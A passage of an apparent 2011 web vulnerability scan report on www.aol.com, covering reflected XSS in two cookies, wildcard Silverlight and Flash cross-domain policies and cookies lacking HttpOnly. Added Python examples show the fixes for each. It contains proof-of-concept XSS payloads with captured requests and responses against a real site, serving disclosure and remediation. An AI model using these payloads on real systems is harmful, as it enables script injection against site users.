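The two output contexts in this section are a JavaScript string literal (2.1, and the same shape in 2.3, 2.4 and the cookie findings 2.6 to 2.8) and a double-quoted HTML attribute (2.5). The block below is an added example, written in Python rather than the application's JSP, and is not code from the report or from www.aol.com: it rebuilds the two reflecting templates as they appear in the captured responses, shows the payloads from 2.1 and 2.5 breaking out of them, and shows a context-specific encoder for each that keeps the value inside the literal or attribute. The render_* and *_intact helper names are invented for the illustration.

```python
import html
import json
import re

# Payloads from sections 2.1 and 2.5 of the report, URL-decoded.
JS_PAYLOAD = '7ee19";alert(1)//75b3c833dad'
ATTR_PAYLOAD = 'ec3dd"><img src=a onerror=alert(1)>c5f8d88b13f'


# --- JavaScript string context (2.1: var dlact = "...";) ---

def render_script_vulnerable(dlact):
    # Raw concatenation, the shape of the inline script in the response above.
    return 'var dlact = "' + dlact + '";'


def js_string_literal(value):
    """Serialise value as a JS string literal safe inside an inline <script>.

    json.dumps escapes the quote, backslash and control characters. The
    HTML parser scans the raw text of a <script> element for </script and
    <!-- before any JavaScript runs, so <, > and & are rewritten as \\uXXXX
    escapes as well. U+2028/U+2029 are escaped because pre-ES2019 engines
    reject them inside string literals.
    """
    literal = json.dumps(value, ensure_ascii=False)
    for ch, esc in (("<", "\\u003c"), (">", "\\u003e"), ("&", "\\u0026"),
                    ("\u2028", "\\u2028"), ("\u2029", "\\u2029")):
        literal = literal.replace(ch, esc)
    return literal


def render_script_safe(dlact):
    return "var dlact = " + js_string_literal(dlact) + ";"


_SCRIPT_LINE = re.compile(r'^var dlact = "((?:[^"\\]|\\.)*)";$')


def script_literal_intact(rendered):
    """True if the whole value is still inside one string literal."""
    return _SCRIPT_LINE.fullmatch(rendered) is not None


def literal_roundtrips(value):
    # The escaped literal is valid JSON, so decoding it must give the value back.
    return json.loads(js_string_literal(value)) == value


# --- HTML attribute context (2.5: <div class="videoPerm" id="...-mod">) ---

def render_attr_vulnerable(video_id):
    return '<div class="videoPerm" id="' + video_id + '-mod">'


def render_attr_safe(video_id):
    # quote=True also encodes " and ', so the value cannot close the
    # attribute; < and > are encoded so it cannot open a new tag either.
    return '<div class="videoPerm" id="' + html.escape(video_id, quote=True) + '-mod">'


_ATTR_TAG = re.compile(r'^<div class="videoPerm" id="([^"<>]*)-mod">$')


def attr_intact(rendered):
    """True if the output is still one div with a single quoted id attribute."""
    return _ATTR_TAG.fullmatch(rendered) is not None


def attr_value_roundtrips(video_id):
    # What the browser decodes from the attribute must equal the input.
    m = _ATTR_TAG.fullmatch(render_attr_safe(video_id))
    return m is not None and html.unescape(m.group(1)) == video_id


if __name__ == "__main__":
    print(render_script_vulnerable(JS_PAYLOAD))  # literal ends early; alert(1) is code
    print(render_script_safe(JS_PAYLOAD))        # one literal; alert(1) is data
    print(render_attr_vulnerable(ATTR_PAYLOAD))  # attribute closed; <img> is a new tag
    print(render_attr_safe(ATTR_PAYLOAD))        # attribute intact; &lt;img is text
```

The point of the two *_intact checks is that the encoder is chosen by the context the value lands in, not by the character set of the input: HTML-entity encoding the dlact value would not stop the `";` break-out in the script block, and JavaScript escaping alone would not stop the `"><img` break-out in the attribute. As the remediation detail above says, the better fix for the script case is not to echo the value into a script at all (for example, emit it in a data attribute and read it from the DOM).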

2.6. http://www.aol.com/ [dlact cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aol.com
Path:   /

Issue detail

The value of the dlact cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e0507"-alert(1)-"c2760e5e3ad was submitted in the dlact cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET / HTTP/1.1
Host: www.aol.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2722E86A051D367A-6000013620041512[CE]; tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; s_pers=%20s_getnr%3D1313705608337-New%7C1376777608337%3B%20s_nrgvo%3DNew%7C1376777608338%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; rrpmo1=rr1~1~1313705590192~0; stips5=1; UNAUTHID=1.1e73089cc54a11e0be833dd12c581347.7e0f; CUNAUTHID=1.1e73089cc54a11e0be833dd12c581347.7e0f; dlact=dl5e0507"-alert(1)-"c2760e5e3ad

Response

HTTP/1.1 200 OK
Date: Thu, 18 Aug 2011 22:15:42 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-149-174-174-52.asset.aol.com
Content-Type: text/html;;charset=utf-8
Set-Cookie: JSESSIONID=735A63F95E2408B60CA93A698B703DCD; Path=/aol
Content-Length: 81380

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.fac
...[SNIP]...
<script type="text/javascript">
var dlImps = new Array();dlImps["dl1"]=true;
var dlact = "dl5e0507"-alert(1)-"c2760e5e3ad";
var dlduration = 10000;
var dloverrided = false;
var dlcurr = 1;
var dltotal = 25;
var paramslot = "dynamiclead";
var dloffset = 0;
var ftmslo
...[SNIP]...

2.7. http://www.aol.com/ [rrpmo1 cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aol.com
Path:   /

Issue detail

The value of the rrpmo1 cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2ee54"-alert(1)-"e1fb94620f3 was submitted in the rrpmo1 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET / HTTP/1.1
Host: www.aol.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2722E86A051D367A-6000013620041512[CE]; tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; s_pers=%20s_getnr%3D1313705608337-New%7C1376777608337%3B%20s_nrgvo%3DNew%7C1376777608338%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; rrpmo1=rr1~1~1313705590192~02ee54"-alert(1)-"e1fb94620f3; stips5=1; UNAUTHID=1.1e73089cc54a11e0be833dd12c581347.7e0f; CUNAUTHID=1.1e73089cc54a11e0be833dd12c581347.7e0f; dlact=dl5

Response

HTTP/1.1 200 OK
Date: Thu, 18 Aug 2011 22:15:32 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-207-200-106-73.asset.aol.com
Content-Type: text/html;;charset=utf-8
Set-Cookie: JSESSIONID=69567B52D7FA279BFACAC498504736BA; Path=/aol
Content-Length: 81536

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.fac
...[SNIP]...
<script type="text/javascript">
var origUrl="http%3A%2F%2Fwww.aol.com%2F";
var ae_url="https://www.aol.com/aimexpress.jsp";
cookies.set("rrpmo1","rr1~2~1313705590192~02ee54"-alert(1)-"e1fb94620f3");</script>
...[SNIP]...

2.8. http://www.aol.com/video/urlesque-mans-about-to-do-the-impossible/1116699228001/ [rrpmo1 cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aol.com
Path:   /video/urlesque-mans-about-to-do-the-impossible/1116699228001/

Issue detail

The value of the rrpmo1 cookie is copied, unencoded, into a double-quoted JavaScript string literal inside an inline <script> block. The payload e3668"-alert(1)-"fd726e338a was submitted in the rrpmo1 cookie and was echoed unmodified in the application's response.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response: the payload closes the string literal, evaluates alert(1) as an operand of the subtraction operator, and reopens a literal, so the statement stays syntactically valid. This is the same cookies.set() emitter as in 2.7, reached from the video page rather than the front page.

Because the user data copied into the response comes from a cookie, the behaviour is not trivial to exploit against another user: the attacker first needs a way to plant an arbitrary cookie value in the victim's browser, for example a cookie scoped to the parent domain set from another aol.com host, or a Set-Cookie header injected by a network-position attacker on this plain-HTTP site. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and makes XSS hard to prevent. If at all possible, the application should avoid echoing user data within this context; otherwise validate the cookie against its expected format and emit it as a JSON-encoded string literal rather than concatenating the raw value between quotation marks.

Request

GET /video/urlesque-mans-about-to-do-the-impossible/1116699228001/ HTTP/1.1
Host: www.aol.com
Proxy-Connection: keep-alive
Referer: http://www.aol.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2722E86A051D367A-6000013620041512[CE]; tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; s_pers=%20s_getnr%3D1313705608337-New%7C1376777608337%3B%20s_nrgvo%3DNew%7C1376777608338%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; rrpmo1=rr1~1~1313705590192~0e3668"-alert(1)-"fd726e338a; stips5=1; dlact=dl5; UNAUTHID=1.1e73089cc54a11e0be833dd12c581347.7e0f; CUNAUTHID=1.1e73089cc54a11e0be833dd12c581347.7e0f

Response

HTTP/1.1 200 OK
Date: Thu, 18 Aug 2011 22:16:24 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-149-174-174-36.asset.aol.com
Content-Type: text/html;;charset=utf-8
Set-Cookie: JSESSIONID=1FCF9FA99CF7E3C6E0DFDE60B5D06216; Path=/aol
Content-Length: 40902

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.fac
...[SNIP]...
<script type="text/javascript">
var origUrl="http%3A%2F%2Fwww.aol.com%2F";
var ae_url="https://www.aol.com/aimexpress.jsp";
cookies.set("rrpmo1","rr1~2~1313705590192~0e3668"-alert(1)-"fd726e338a");</script>
...[SNIP]...
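The emitter pattern behind findings 2.7 and 2.8, beside a hardened version, as an added example that is not code from the report or from the site under test. The payload is the one captured in 2.7; the rrpmo1 format regex is an assumption derived from the benign values seen in the captured Cookie headers, not a documented format. A small tokenizer shows where the injected text lands in each case.

```python
import json
import re

# Cookie value as submitted in finding 2.7 (taken from the report's Cookie
# header). The "-alert(1)-" fragment closes the double-quoted literal,
# evaluates alert(1) as an operand of the subtraction operator and reopens a
# literal, so the statement stays syntactically valid and the script runs.
PAYLOAD = 'rr1~1~1313705590192~02ee54"-alert(1)-"e1fb94620f3'

# Shape of the benign values in this report (rr1~1~<13-digit epoch ms>~0).
# Assumption derived from the captured cookies, not a documented format.
RRPMO1_FORMAT = re.compile(r'^rr\d+~\d+~\d{13}~\d+$')


def looks_like_rrpmo1(value: str) -> bool:
    """Allowlist check applied before the value is ever echoed."""
    return RRPMO1_FORMAT.match(value) is not None


def render_vulnerable(cookie_value: str) -> str:
    """Mirrors the page's pattern: the raw cookie value is concatenated
    into a double-quoted JavaScript string literal."""
    return 'cookies.set("rrpmo1","%s");' % cookie_value


def js_string_literal(value: str) -> str:
    """Encode value as a JavaScript string literal that is safe inside an
    inline <script>. json.dumps escapes quotes, backslashes and control
    characters. On top of that, '</' is escaped (the HTML parser would honour
    a </script> breakout before any JS quoting matters) and U+2028/U+2029
    are escaped (legal unescaped in JSON, line terminators in older JS;
    json.dumps with ensure_ascii=True already does this, the replace keeps
    the guarantee if someone switches ensure_ascii off)."""
    s = json.dumps(value)
    s = s.replace('</', '<\\/')
    s = s.replace('\u2028', '\\u2028').replace('\u2029', '\\u2029')
    return s


def render_encoded(cookie_value: str) -> str:
    """Encoding alone: the payload stays inside one literal."""
    return 'cookies.set("rrpmo1",%s);' % js_string_literal(cookie_value)


def render_safe(cookie_value: str) -> str:
    """Validate first, then encode; off-format values are dropped, not echoed."""
    if not looks_like_rrpmo1(cookie_value):
        cookie_value = ''
    return render_encoded(cookie_value)


def split_script(script: str):
    """Tiny tokenizer: returns (literals, code) where `literals` holds the
    contents of each double-quoted JS string literal in `script` and `code`
    is everything outside them. Backslash escapes inside literals are
    honoured, so an escaped quote does not end a literal."""
    literals, code, buf = [], [], []
    in_str, i, n = False, 0, len(script)
    while i < n:
        c = script[i]
        if in_str:
            if c == '\\' and i + 1 < n:      # keep the escape pair intact
                buf.append(script[i:i + 2])
                i += 2
                continue
            if c == '"':
                literals.append(''.join(buf))
                buf, in_str = [], False
            else:
                buf.append(c)
        elif c == '"':
            in_str = True
        else:
            code.append(c)
        i += 1
    return literals, ''.join(code)


def injected_code(script: str) -> str:
    """Code that ended up outside any string literal; for the hardened
    emitter this is only the call skeleton."""
    return split_script(script)[1]


def roundtrip_ok(value: str) -> bool:
    """The encoded literal must decode back to the original value."""
    return json.loads(js_string_literal(value)) == value


if __name__ == '__main__':
    for render in (render_vulnerable, render_encoded, render_safe):
        out = render(PAYLOAD)
        print(out)
        print('   outside literals:', injected_code(out))
```

Running the block prints the three emitted statements; for the vulnerable one the tokenizer reports `-alert(1)-` outside any literal, for the other two only the call skeleton.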

3. Silverlight cross-domain policy

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.aol.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy (clientaccesspolicy.xml) whose <allow-from> element contains <domain uri="*"/>, which allows access from any origin.

Allowing access from all domains means that a Silverlight application hosted on any web site can issue requests to the resources listed under <grant-to> (truncated in the capture below) with the user's cookies attached and read the responses, a bypass of the same-origin policy for those paths. Unless those resources consist entirely of unprotected public content, this policy is likely to present a significant security risk.

Issue background

The Silverlight cross-domain policy controls whether Silverlight client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains allowed by the Silverlight cross-domain policy and determine whether it is appropriate to fully trust both the intentions and the security posture of each. Here that means replacing uri="*" with the explicit origins that host Silverlight clients needing this data, and narrowing the <grant-to> paths to resources that are genuinely public.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: www.aol.com

Response

HTTP/1.1 200 OK
Date: Thu, 18 Aug 2011 22:13:47 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 314
Keep-Alive: timeout=5, max=38
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

4. Flash cross-domain policy

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.aol.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy (crossdomain.xml) which uses wildcards to specify allowed domains (*.aol.com, *.aolcdn.com, *.unicast.com, *.advertising.com and others), allows access from specific third-party domains (for example ad.doubleclick.net and cdn.digitalcity.com), and allows access from specific subdomains such as startpage.aol.com. The capture below is truncated; the full policy is 1124 bytes.

A wildcard entry means that any host matching the expression can perform two-way interaction with this application. *.aol.com alone extends full trust to every present and future aol.com subdomain, so a script injection or file upload on any one of them becomes a cross-origin read of www.aol.com with the victim's cookies. You should only use a wildcard if you fully trust every possible web site that may reside on a matching host.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. Entries for advertising and content-delivery partners extend that trust to whatever those third parties, and anyone who compromises them, choose to serve.

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains allowed by the Flash cross-domain policy and determine whether it is appropriate to fully trust both the intentions and the security posture of each. Here the third-party advertising and CDN entries and the *.aol.com wildcard are the ones to justify or remove; where a partner genuinely needs Flash access, name the specific host rather than a wildcard.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.aol.com

Response

HTTP/1.1 200 OK
Date: Thu, 18 Aug 2011 22:13:47 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 1124
Keep-Alive: timeout=5, max=93
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.aol.com" />
<allow-access-from domain="*.channels.aol.com" />
<allow-access-from domain="*.web.aol.com" />
<allow-access-from domain="*.my.aol.com" />
<allow-access-from domain="channelevents.estage.aol.com" />
<allow-access-from domain="channelevents.aol.com" />
<allow-access-from domain="*.office.aol.com" />
<allow-access-from domain="*.channel.aol.com" />
<allow-access-from domain="cdn-startpage.aol.com" />
<allow-access-from domain="startpage.aol.com" />
<allow-access-from domain="cdn.digitalcity.com" />
<allow-access-from domain="progressive.stream.aol.com" />
<allow-access-from domain="ad.doubleclick.net" />
<allow-access-from domain="*.aolcdn.com" />
<allow-access-from domain="*.unicast.com" />
<allow-access-from domain="*.advertising.com"/>
...[SNIP]...
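A checker for both policy files in sections 3 and 4, as an added example rather than code from the report or from a scanner. The two policy documents are constructed from what the capture shows: the Silverlight <grant-to> resource is an assumption (the report cuts off before it), and the Flash policy is a subset of the captured entries with a closing tag added. Each allowed entry is bucketed relative to the site's own registrable domain, which is what a reviewer has to justify entry by entry.

```python
import xml.etree.ElementTree as ET

# Constructed sample: the clientaccesspolicy.xml captured above, completed
# past the point where the report truncates it. The <grant-to> resource is
# an assumption; the page only shows the <allow-from> wildcard.
SILVERLIGHT_POLICY = """<?xml version="1.0" encoding="utf-8"?>
<access-policy>
  <cross-domain-access>
    <policy>
      <allow-from>
        <domain uri="*"/>
      </allow-from>
      <grant-to>
        <resource path="/" include-subpaths="true"/>
      </grant-to>
    </policy>
  </cross-domain-access>
</access-policy>
"""

# Constructed sample: a subset of the crossdomain.xml entries visible in the
# capture (the original is 1124 bytes and cut off after *.advertising.com).
FLASH_POLICY = """<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.aol.com" />
<allow-access-from domain="*.channels.aol.com" />
<allow-access-from domain="channelevents.aol.com" />
<allow-access-from domain="cdn-startpage.aol.com" />
<allow-access-from domain="startpage.aol.com" />
<allow-access-from domain="cdn.digitalcity.com" />
<allow-access-from domain="progressive.stream.aol.com" />
<allow-access-from domain="ad.doubleclick.net" />
<allow-access-from domain="*.aolcdn.com" />
<allow-access-from domain="*.unicast.com" />
<allow-access-from domain="*.advertising.com"/>
</cross-domain-policy>
"""


def classify(pattern: str, own_domain: str) -> str:
    """Bucket one allowed-origin pattern relative to the site's own domain.
    Silverlight uris may carry a scheme, port or path; Flash entries are
    bare host patterns. Both are reduced to the host part first."""
    p = pattern.strip().lower()
    host = p.split('://', 1)[1] if '://' in p else p
    host = host.split('/', 1)[0].split(':', 1)[0]
    if host in ('', '*'):
        return 'any-origin'
    own = host == own_domain or host.endswith('.' + own_domain)
    wildcard = host.startswith('*.')
    if wildcard and not own:
        return 'third-party-wildcard'
    if wildcard:
        return 'subdomain-wildcard'
    return 'own-host' if own else 'third-party'


def audit_silverlight(xml_text: str, own_domain: str):
    """(uri, class) for every <domain> under <allow-from>."""
    root = ET.fromstring(xml_text.encode('utf-8'))
    return [(d.get('uri', ''), classify(d.get('uri', ''), own_domain))
            for d in root.iter('domain')]


def audit_flash(xml_text: str, own_domain: str):
    """(domain, class) for every <allow-access-from>; secure="false" on a
    policy served over HTTPS lets plain-HTTP origins in, so it is flagged."""
    root = ET.fromstring(xml_text.encode('utf-8'))
    out = []
    for el in root.iter('allow-access-from'):
        dom = el.get('domain', '')
        cls = classify(dom, own_domain)
        if el.get('secure', 'true').lower() == 'false':
            cls += '+insecure'
        out.append((dom, cls))
    return out


def risky(findings):
    """Entries a reviewer must justify: anything that is not a single own host."""
    return [(d, c) for d, c in findings if c != 'own-host']


if __name__ == '__main__':
    for name, finds in (('silverlight', audit_silverlight(SILVERLIGHT_POLICY, 'aol.com')),
                        ('flash', audit_flash(FLASH_POLICY, 'aol.com'))):
        for dom, cls in risky(finds):
            print('%-11s %-28s %s' % (name, dom, cls))
```

The point of the bucketing is that `any-origin` (the Silverlight wildcard) is an immediate finding, while `subdomain-wildcard` and `third-party` entries are findings only if the granted resources carry anything beyond public content; the checker leaves that judgement to the reviewer rather than guessing.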

5. Cookie without HttpOnly flag set
There are 5 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read (or overwritten) through document.cookie by client-side JavaScript. This prevents an injected script from trivially exfiltrating the cookie, which matters most for session tokens.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless a legitimate client-side script in your application must read or set a cookie's value, set the flag by adding the HttpOnly attribute to the relevant Set-Cookie header (for the Tomcat-issued JSESSIONID seen here, that is a servlet-container setting rather than application code).

You should be aware that the restrictions imposed by the HttpOnly flag can be circumvented in some circumstances (for example through cross-site tracing where the TRACE method is enabled), and that an injected script can act within the victim's session without ever reading the cookie, so HttpOnly mitigates cookie theft, not cross-site scripting itself.
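A Set-Cookie audit for the responses in this section, as an added example that is not part of the report. The sample headers are constructed from the 5.1 response above (the tst value is shortened). Besides the HttpOnly and Secure checks, it applies the RFC 6265 path-match rule, which is what reveals that a JSESSIONID scoped to Path=/aol is never returned on requests to / or /video/...; the session-token heuristic is a name match, as in the scanner's "appears to contain a session token".

```python
import re

# Constructed from the Set-Cookie headers in the 5.1 response above
# (tst value shortened; its real value is a longer URL-encoded list).
SAMPLE_SET_COOKIE = [
    'JSESSIONID=CFBB5CE095545547E8FF9BC0BB462364; Path=/aol',
    'tst=%2C1%2Cs391a%3A%2C1%2Cs392a; Expires=Sat, 17-Aug-2013 22:13:44 GMT; Path=/',
]

# Name heuristic for "looks like a session token"; a reviewer still has to
# confirm what the cookie actually carries.
SESSION_LIKE = re.compile(r'sess|auth|token|sid$', re.I)


def parse_set_cookie(header: str) -> dict:
    """Split one Set-Cookie header into name, value and lower-cased attrs.
    Attribute values (e.g. the comma in Expires) are kept verbatim."""
    parts = [p.strip() for p in header.split(';')]
    name, _, value = parts[0].partition('=')
    attrs = {}
    for p in parts[1:]:
        k, _, v = p.partition('=')
        attrs[k.strip().lower()] = v.strip()
    return {'name': name.strip(), 'value': value.strip(), 'attrs': attrs}


def default_path(request_path: str) -> str:
    """RFC 6265 5.1.4 default-path used when no Path attribute is given."""
    if not request_path.startswith('/') or request_path.count('/') == 1:
        return '/'
    return request_path.rsplit('/', 1)[0] or '/'


def path_matches(cookie_path: str, request_path: str) -> bool:
    """RFC 6265 5.1.4 path-match: the browser only returns the cookie on
    request paths that match."""
    if request_path == cookie_path:
        return True
    if not request_path.startswith(cookie_path):
        return False
    return cookie_path.endswith('/') or request_path[len(cookie_path)] == '/'


def audit_response(request_path: str, over_https: bool, set_cookie_headers):
    """(cookie name, issue) pairs for every Set-Cookie in a response."""
    issues = []
    for h in set_cookie_headers:
        c = parse_set_cookie(h)
        name, attrs = c['name'], c['attrs']
        if 'httponly' not in attrs:
            issues.append((name, 'missing-httponly'))
        if over_https and 'secure' not in attrs:
            issues.append((name, 'missing-secure'))
        if SESSION_LIKE.search(name):
            issues.append((name, 'session-like-name'))
        cookie_path = attrs.get('path') or default_path(request_path)
        if not path_matches(cookie_path, request_path):
            # Issued but never sent back to the URL that issued it.
            issues.append((name, 'path-does-not-cover-request'))
    return issues


if __name__ == '__main__':
    for name, issue in audit_response('/', False, SAMPLE_SET_COOKIE):
        print('%-12s %s' % (name, issue))
```

The `path-does-not-cover-request` result is the practitioner's caveat for every instance in this section: a token the browser never presents on these URLs is a weak prize for cookie theft, so the severity here hinges on whether anything under /aol/ uses it.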



5.1. http://www.aol.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.aol.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: JSESSIONID and tst. JSESSIONID appears to contain a session token, which may increase the risk associated with this issue; note, however, that it is issued with Path=/aol, so browsers will not return it on requests to / (none of the Cookie headers captured in this report carry it), which limits what an attacker could do with a stolen copy here. The tst cookie is persistent, with a two-year expiry. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]

Response

HTTP/1.1 200 OK
Date: Thu, 18 Aug 2011 22:13:43 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-149-174-174-44.asset.aol.com
Content-Type: text/html;;charset=utf-8
Set-Cookie: JSESSIONID=CFBB5CE095545547E8FF9BC0BB462364; Path=/aol
Set-Cookie: tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; Expires=Sat, 17-Aug-2013 22:13:44 GMT; Path=/
Content-Length: 81413

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.fac
...[SNIP]...

5.2. http://www.aol.com/ajax.jsp

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.aol.com
Path:   /ajax.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: JSESSIONID (Path=/aol). The name indicates a session token, which may increase the risk associated with this issue, although the /aol path scope means the browser will not present it on this /ajax.jsp request. You should review the contents of the cookie to determine its function.

Request

GET /ajax.jsp?m=dynamiclead&p=dynamicleadslide&vbclass=vid_over&dlNo=3&ajax=1&sitHot=&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config HTTP/1.1
Host: www.aol.com
Proxy-Connection: keep-alive
Referer: http://www.aol.com/
Aolcom-Ajax: 1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
